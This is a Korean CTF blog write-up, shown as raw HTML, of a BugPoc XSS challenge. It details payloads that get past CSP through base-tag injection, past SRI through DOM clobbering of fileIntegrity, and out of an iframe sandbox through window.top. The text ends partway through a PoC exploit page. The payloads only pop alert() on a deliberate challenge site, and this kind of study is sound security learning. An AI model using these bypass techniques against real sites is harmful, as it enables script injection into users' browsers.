<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="DescriptionsBugPoc에서 만든 XSS Challenge이고, 문제의 목적은 CSP&#x2F;SRI 및 Sandbox를 우회하고, XSS를 트리거 하는 것이다. 나는 SRI 때문에 3일에 거쳐 풀었다.  Analysis 위 사진을 보면 Wacky Text를 입력해주면 해당 값이 Dom 내부에 삽입되는 것을 볼 수 있다.  콘솔창을 확인해 보니 iframe">
<meta property="og:type" content="article">
<meta property="og:title" content="BugPoc XSS Challenge Write Up">
<meta property="og:url" content="http://example.com/2021/06/10/2021-06-10-bugpoc/index.html">
<meta property="og:site_name" content="Home">
<meta property="og:description" content="DescriptionsBugPoc에서 만든 XSS Challenge이고, 문제의 목적은 CSP&#x2F;SRI 및 Sandbox를 우회하고, XSS를 트리거 하는 것이다. 나는 SRI 때문에 3일에 거쳐 풀었다.  Analysis 위 사진을 보면 Wacky Text를 입력해주면 해당 값이 Dom 내부에 삽입되는 것을 볼 수 있다.  콘솔창을 확인해 보니 iframe">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/1.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/2.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/3.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/4.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/5.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/6.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/7.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/9.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/8.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/10.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/11.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/12.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/13.png?raw=true">
<meta property="article:published_time" content="2021-06-10T00:00:11.000Z">
<meta property="article:modified_time" content="2021-06-09T17:26:45.643Z">
<meta property="article:author" content="Jeongwon Jo">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/1.png?raw=true">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>BugPoc XSS Challenge Write Up</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2021/06/09/2021-01-15-note/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/06/10/2021-06-10-bugpoc/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&text=BugPoc XSS Challenge Write Up"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&is_video=false&description=BugPoc XSS Challenge Write Up"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=BugPoc XSS Challenge Write Up&body=Check out this article: http://example.com/2021/06/10/2021-06-10-bugpoc/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&name=BugPoc XSS Challenge Write Up&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/06/10/2021-06-10-bugpoc/&t=BugPoc XSS Challenge Write Up"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Descriptions"><span class="toc-number">1.</span> <span class="toc-text">Descriptions</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">2.</span> <span class="toc-text">Analysis</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Poc-Sollution"><span class="toc-number"></span> <span class="toc-text">Poc (Sollution)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Reference"><span class="toc-number">1.</span> <span class="toc-text">Reference</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        BugPoc XSS Challenge Write Up
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Jeongwon Jo</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-06-10T00:00:11.000Z" itemprop="datePublished">2021-06-10</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/XSS/" rel="tag">XSS</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="Descriptions"><a href="#Descriptions" class="headerlink" title="Descriptions"></a>Descriptions</h2><p><a target="_blank" rel="noopener" href="https://bugpoc.com/">BugPoc</a>에서 만든 XSS Challenge이고, 문제의 목적은 CSP/SRI 및 Sandbox를 우회하고, XSS를 트리거 하는 것이다. 나는 SRI 때문에 3일에 거쳐 풀었다.</p>
<hr>
<h2 id="Analysis"><a href="#Analysis" class="headerlink" title="Analysis"></a>Analysis</h2><p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/1.png?raw=true"></p>
<p>위 사진을 보면 Wacky Text를 입력해주면 해당 값이 Dom 내부에 삽입되는 것을 볼 수 있다.</p>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/2.png?raw=true"></p>
<p>콘솔창을 확인해 보니 <code>iframe</code>을 이용해서 <code>/frame.html</code>의 돔을 끌어와서 사용하는 것을 볼 수 있다. </p>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/3.png?raw=true"></p>
<p>그래서 <code>/frame.html</code>로 접근을 해보니 아니나 다를까 Error 페이지가 발생하는 것 이었다.</p>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/4.png?raw=true"></p>
<p>코드를 확인해 보니 190 line에서 window.name의 값이 “iframe”인 지 아닌 지를 검증하고 있고, window.name의 값이 “iframe”이 아니라면 else 문에 의해서 Error 페이지가 출력이 되는 것 이다.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">title</span>&gt;</span>XSS Poc : CSP/SRI/Sandbox Bypass<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">            <span class="keyword">const</span> exploit = <span class="function"><span class="keyword">function</span> (<span class="params"></span>)</span>&#123;</span></span><br><span class="line"><span class="javascript">                <span class="keyword">const</span> payload = <span class="string">&#x27;pocas&#x27;</span>;</span></span><br><span class="line"><span class="javascript">                <span class="keyword">const</span> url = <span class="string">`https://wacky.buggywebsite.com/frame.html?param=<span class="subst">$&#123;payload&#125;</span>`</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">                <span class="built_in">window</span>.name = <span class="string">&#x27;iframe&#x27;</span>;</span></span><br><span class="line"><span class="javascript">                <span class="built_in">window</span>.location = url;</span></span><br><span class="line">            &#125;</span><br><span class="line">        <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line">       <span class="tag">&lt;<span class="name">h3</span>&gt;</span>If you click the button below.<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&#x27;button&#x27;</span> <span class="attr">onclick</span>= <span class="string">&#x27;exploit()&#x27;</span> <span class="attr">value</span>=<span class="string">&#x27;Trigger&#x27;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>그래서 위와 같이 window.name의 값으로 “iframe”을 주고, window.location 메서드를 이용해서 라디아렉트를 시켜주니 window.name 검증은 쉽게 해결 할 수 있었다.</p>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/5.png?raw=true"></p>
<p>그리고 나서 <code>&lt;svg/onload=alert(1)&gt;</code>을 이용해서 XSS 트리거를 시도 했지만 입력값이 split으로 쪼개져서 위와 같이 들어가게 된다.</p>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/6.png?raw=true"></p>
<p>하지만 입력값이 바디 부분에만 들어가는 것이 아닌 헤드에 있는 타이틀의 값으로도 들어가기 때문에 타이틀 태그를 닫고 xss 트리거 시도를 하면 될 거 같다.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Refused to execute inline event handler because it violates the following Content Security Policy directive: &quot;script-src &#39;nonce-jogzjbybjuiy&#39; &#39;strict-dynamic&#39;&quot;. Either the &#39;unsafe-inline&#39; keyword, a hash (&#39;sha256-...&#39;), or a nonce (&#39;nonce-...&#39;) is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the &#39;unsafe-hashes&#39; keyword is present.</span><br></pre></td></tr></table></figure>
<p>그래서 <code>&lt;/title&gt;&lt;svg/onload=alert(1)&gt;</code>를 전달해주니 Dom Parsing에 의해서 Dom으로 잘 들어가는 것을 확인 할 수 있었는데 위와 같이 CSP 에러가 나는 것을 확인 할 수 있었다.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">content-security-policy: script-src &#39;nonce-jogzjbybjuiy&#39; &#39;strict-dynamic&#39;; frame-src &#39;self&#39;; object-src &#39;none&#39;;</span><br></pre></td></tr></table></figure>
<p>Response를 확인해보면 위와 같이 CSP가 설정되어 있는 것을 볼 수 있다. 그래서 <code>CSP Evaluator</code>를 이용해서 해당 CSP 위험도를 확인해보니 base-uri가 누락되면 스크립트를 삽입할 수 있다고 한다.</p>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/7.png?raw=true"></p>
<p>그래서 개인서버에 xss payload를 올리고 위와 같이 <base> 태그를 이용해서 익스를 시도하니 CSP는 우회가 되었지만 SRI에 걸리는 것을 볼 수 있다. SRI는 SubResource Integrity의 줄임말로 무결성을 체크하는 보안 설정 중 하나이다. 이는 웹 서버의 코드가 위/변조가 발생하면 해당 스크립트의 실행을 중지하게 된다. 또한 무결성을 확인을 할 때는 고유의 Hash 값을 이용해서 검증을 한다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// securely load the frame analytics code</span></span><br><span class="line">			<span class="keyword">if</span> (fileIntegrity.value) &#123;</span><br><span class="line">				</span><br><span class="line">				<span class="comment">// create a sandboxed iframe</span></span><br><span class="line">				analyticsFrame = <span class="built_in">document</span>.createElement(<span class="string">&#x27;iframe&#x27;</span>);</span><br><span class="line">				analyticsFrame.setAttribute(<span class="string">&#x27;sandbox&#x27;</span>, <span class="string">&#x27;allow-scripts allow-same-origin&#x27;</span>);</span><br><span class="line">				analyticsFrame.setAttribute(<span class="string">&#x27;class&#x27;</span>, <span class="string">&#x27;invisible&#x27;</span>);</span><br><span class="line">				<span class="built_in">document</span>.body.appendChild(analyticsFrame);</span><br><span class="line"></span><br><span class="line">				<span class="comment">// securely add the analytics code into iframe</span></span><br><span class="line">				script = <span class="built_in">document</span>.createElement(<span class="string">&#x27;script&#x27;</span>);</span><br><span class="line">				script.setAttribute(<span class="string">&#x27;src&#x27;</span>, <span class="string">&#x27;files/analytics/js/frame-analytics.js&#x27;</span>);</span><br><span class="line">				script.setAttribute(<span class="string">&#x27;integrity&#x27;</span>, <span class="string">&#x27;sha256-&#x27;</span>+fileIntegrity.value);</span><br><span class="line">				script.setAttribute(<span class="string">&#x27;crossorigin&#x27;</span>, <span class="string">&#x27;anonymous&#x27;</span>);</span><br><span class="line">				analyticsFrame.contentDocument.body.appendChild(script);</span><br><span class="line">				</span><br><span class="line">			&#125;</span><br></pre></td></tr></table></figure>
<p>위 코드를 확인해 보면 fileIntegrity 객체의 있는 value 값을 이용해서 hash 값을 가져오고, 해당 hash 값과 고유의 hash 값을 비교하게 된다. 다시 SRI 에러를 확인해보면 <code>https://nq5h16dpmbg2.redir.bugpoc.ninja/files/analytics/js/frame-analytics.js</code>의 대한 Integrity의 digest 값을 찾지 못 해서 <code>&lt;your hash value&gt;</code> 값을 블록했다고 한다.</p>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/9.png?raw=true"></p>
<p><code>/files/analytics/js/frame-analytics.js</code>의 값을 확인 해보면 위와 같다.</p>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/8.png?raw=true"></p>
<p>그리고 base 태그를 이용해서 스크립트를 삽입 한 후에는 <code>frame-analytics.js</code>의 값이 alert(1)로 변조가 된 것을 볼 수 있다. </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl dgst -sha384 -binary FILENAME.js | openssl base64 -A</span><br></pre></td></tr></table></figure>
<p>그럼 <code>frame-.js</code>의 파일 값이 변조가 되었다고 왜 SRI에 걸리냐고 궁금해 할 수도 있다. 이는 Hash를 생성하는 방법을 보면 알다시피 특정 파일 값을 기준으로 hash 값을 생성한다. 즉, 문제에서는 alert(1)로 변조 되기 전에 파일 값으로 hash 값을 생성해서 사용하고 있는데, 우리가 해당 파일의 값을 alert(1)로 변조하였기 때문에 hash 값 자체가 달라지므로 SRI에 걸리게 된다.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fileIntegrity.value</span><br></pre></td></tr></table></figure>
<p>하지만 js 단에서 Integrity 값을 가져 올 때, 위와 같이 값을 가져오게 된다. 하지만 우리는 해당 값으로 고유의 hash 값을 넣어줘야 하는데 이는 <code>Dom Clobbering</code> 기법을 이용해서 처리할 수 있다.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">output</span> <span class="attr">id</span>=<span class="string">&quot;fileIntegrity&quot;</span>&gt;</span>Hello Pocas<span class="tag">&lt;/<span class="name">output</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line">    alert(fileIntegrity.value);</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/10.png?raw=true"></p>
<p>위와 같이 코드를 올리고 실행하면 <code>fileIntegrity.value</code>의 값으로 <code>Hello Pocas</code>가 들어가는 것을 볼 수 있다.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;/<span class="name">title</span>&gt;</span><span class="tag">&lt;<span class="name">output</span> <span class="attr">id</span>=<span class="string">&quot;fileIntegrity&quot;</span>&gt;</span>Hello Pocas<span class="tag">&lt;/<span class="name">output</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/11.png?raw=true"></p>
<p>그래서 위 페이로드를 작성해서 전달해주고, 콘솔 창에서 fileIntegrity.value를 입력해보면 우리가 입력한 고유의 값이 박힌 것을 볼 수 있다.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;/<span class="name">title</span>&gt;</span><span class="tag">&lt;<span class="name">BASE</span> <span class="attr">HREF</span>=<span class="string">&quot;https://nq5h16dpmbg2.redir.bugpoc.ninja&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">output</span> <span class="attr">id</span>=<span class="string">&quot;fileIntegrity&quot;</span>&gt;</span>bhHHL3z2vDgxUt0W3dWQOrprscmda2Y5pLsLg4GF%2bpI=<span class="tag">&lt;/<span class="name">output</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/12.png?raw=true"></p>
<p>그래서 <code>Dom Clobbering</code> 기법을 이용해서 fileIntegrity의 값을 변조해주니 SRI도 잘 우회한 것을 볼 수 있다. 하지만 위와 같이 <code>Sandbox</code> 설정에 의해서 alert() 함수가 실행이 되지 않는 것을 볼 수 있다. 하지만 이 <code>Sandbox</code>는 현재 Iframe에만 적용이 되어 있기 때문에 <code>top</code>, <code>parent</code> 돔의 참조해서 alert()를 끌어와 사용하면 쉽게 우회할 수 있다.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;/<span class="name">title</span>&gt;</span><span class="tag">&lt;<span class="name">BASE</span> <span class="attr">HREF</span>=<span class="string">&quot;https://p93yp8ell2os.redir.bugpoc.ninja&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">output</span> <span class="attr">id</span>=<span class="string">&quot;fileIntegrity&quot;</span>&gt;</span>pUo1a+NaJwmvkDH8uSo6a1Z+emeQfamsHK2k52tjpTE=<span class="tag">&lt;/<span class="name">output</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/wjddnjs33/Poc/blob/main/wargame/XSS%20Challenge%20in%20BugPoc/images/13.png?raw=true"></p>
<p>그래서 마지막으로 위와 같이 페이로드를 작성해주고 보내주면 XSS가 잘 트리거 되는 것을 볼 수 있다. 또한 위 페이로드가 전 페이로드와 Hash 값이 다른 이유는 위에 이야기 했다 시피 고유의 해쉬 값은 파일의 컨텐츠 값에 따라서 달라지기 때문이다.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">frame-analytics.js의 값이 alert(1) 일 때의 해쉬 값 &#x3D;&gt; bhHHL3z2vDgxUt0W3dWQOrprscmda2Y5pLsLg4GF+pI&#x3D;</span><br><span class="line">frame-analytics.js의 값이 window.top.alert(1) 일 때의 해쉬 값 &#x3D;&gt; pUo1a+NaJwmvkDH8uSo6a1Z+emeQfamsHK2k52tjpTE&#x3D;</span><br><span class="line">frame-analytics.js의 값이 window.parent.alert(1) 일 때의 해쉬 값 &#x3D;&gt; Vxz2g08RDzmBMHlaYk0sNqiCWbU6UKBSCH+xw2Qa1dM&#x3D;</span><br></pre></td></tr></table></figure>
<p>위와 같이 다 다르다 ㅇㅇ</p>
<hr>
<h1 id="Poc-Sollution"><a href="#Poc-Sollution" class="headerlink" title="Poc (Sollution)"></a>Poc (Sollution)</h1><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">title</span>&gt;</span>XSS Poc : CSP/SRI/Sandbox Bypass<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">            <span class="comment">// content-security-policy: script-src &#x27;nonce-gyzyfhmynqlj&#x27; &#x27;strict-dynamic&#x27;; frame-src &#x27;self&#x27;; object-src &#x27;none&#x27;;</span></span></span><br><span class="line"><span class="javascript">            <span class="comment">// TR;DL : XSS =&gt; CSP Bypass and SRI Bypass using the Dom Clobbering. And finally trigger a xss using the window.top.alert(1).</span></span></span><br><span class="line"><span class="javascript">            <span class="comment">// First, I bypassed csp using the base tag.</span></span></span><br><span class="line"><span class="javascript">            <span class="comment">// Second, I bypassed integrity value used in SRI(SubResource Integrity) using the Dom Clobbering.</span></span></span><br><span class="line"><span class="javascript">            <span class="comment">// Why using the window.top? We should call the alert() method on the wintow.top and window.parent because Using the `sandbox allow-scripts allow-same-origin` in Child iframe. This is sandbox bypass.</span></span></span><br><span class="line">                       </span><br><span class="line"><span class="javascript">            <span class="keyword">const</span> Dom_Clobbering = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span></span><br><span class="line"><span class="handlebars"><span class="xml">                const payload = &#x27;<span class="tag">&lt;/<span class="name">title</span>&gt;</span><span class="tag">&lt;<span class="name">form</span>&gt;</span><span class="tag">&lt;<span class="name">output</span> <span class="attr">id</span>=<span class="string">&quot;fileIntegrity&quot;</span>&gt;</span>Modified<span class="tag">&lt;/<span class="name">output</span>&gt;</span>&#x27;;</span></span></span><br><span class="line"><span class="javascript">                <span class="keyword">const</span> url = <span class="string">`https://wacky.buggywebsite.com/frame.html?param=<span class="subst">$&#123;payload&#125;</span>`</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">                <span class="built_in">window</span>.name = <span class="string">&#x27;iframe&#x27;</span>;</span></span><br><span class="line"><span class="javascript">                <span class="built_in">window</span>.location = url;</span></span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line"><span class="javascript">            <span class="keyword">const</span> exploit = <span class="function"><span class="keyword">function</span> (<span class="params"></span>)</span>&#123;</span></span><br><span class="line"><span class="handlebars"><span class="xml">                const payload = &#x27;<span class="tag">&lt;/<span class="name">title</span>&gt;</span><span class="tag">&lt;<span class="name">BASE</span> <span class="attr">HREF</span>=<span class="string">&quot;https://mfol4633a69b.redir.bugpoc.ninja&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">form</span>&gt;</span><span class="tag">&lt;<span class="name">output</span> <span class="attr">id</span>=<span class="string">&quot;fileIntegrity&quot;</span>&gt;</span>F0NfquGiAKFW0hvQsOmMsnAyVCjs3sjH0IyIf8wogAU=<span class="tag">&lt;/<span class="name">output</span>&gt;</span>&#x27;;</span></span></span><br><span class="line"><span class="javascript">                <span class="keyword">const</span> url = <span class="string">`https://wacky.buggywebsite.com/frame.html?param=<span class="subst">$&#123;payload&#125;</span>`</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">                